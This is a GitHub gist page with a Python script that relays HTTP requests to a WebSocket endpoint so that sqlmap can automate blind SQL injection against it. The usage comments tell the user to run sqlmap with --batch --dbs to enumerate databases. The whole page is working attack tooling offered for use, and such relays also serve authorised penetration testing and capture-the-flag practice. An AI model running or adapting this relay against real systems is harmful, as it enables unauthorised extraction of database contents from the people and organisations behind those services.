Created
January 3, 2023 12:25
-
-
Save jenaye/2b0a369ed85de912926fec69c4f07167 to your computer and use it in GitHub Desktop.
Automating Blind SQL injection over WebSocket By @rayhan0x01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from http.server import SimpleHTTPRequestHandler | |
from socketserver import TCPServer | |
from urllib.parse import unquote, urlparse | |
from websocket import create_connection | |
# check it out : https://github.com/rayhan0x01/rayhan0x01.github.io/blob/gh-pages/_posts/2021-04-02-blind-sqli-over-websocket-automation.md | |
# How to use : python3 mitm_websocket.py ws://localhost:8156/ws then run `http://localhost:8081/?id=1" --batch --dbs` | |
ws_server = sys.argv[1] | |
print("target = ", ws_server) | |
def send_ws(payload): | |
ws = create_connection(ws_server) | |
# If the server returns a response on connect, use below line | |
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here | |
# For our case, format the payload in JSON | |
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure | |
data = '{"id":"%s"}' % message | |
ws.send(data) | |
resp = ws.recv() | |
ws.close() | |
if resp: | |
return resp | |
else: | |
return '' | |
def middleware_server(host_port,content_type="text/plain"): | |
class CustomHandler(SimpleHTTPRequestHandler): | |
def do_GET(self) -> None: | |
self.send_response(200) | |
try: | |
payload = urlparse(self.path).query.split('=',1)[1] | |
except IndexError: | |
payload = False | |
if payload: | |
content = send_ws(payload) | |
else: | |
content = 'No parameters specified!' | |
self.send_header("Content-type", content_type) | |
self.end_headers() | |
self.wfile.write(content.encode()) | |
return | |
class _TCPServer(TCPServer): | |
allow_reuse_address = True | |
httpd = _TCPServer(host_port, CustomHandler) | |
httpd.serve_forever() | |
print("[+] Starting MiddleWare Server") | |
print("[+] Send payloads in http://localhost:8081/?id=*") | |
print('[+] Please run sqlmap -u "http://localhost:8081/?id=1" --batch --dbs') | |
try: | |
middleware_server(('0.0.0.0',8081)) | |
except KeyboardInterrupt: | |
pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment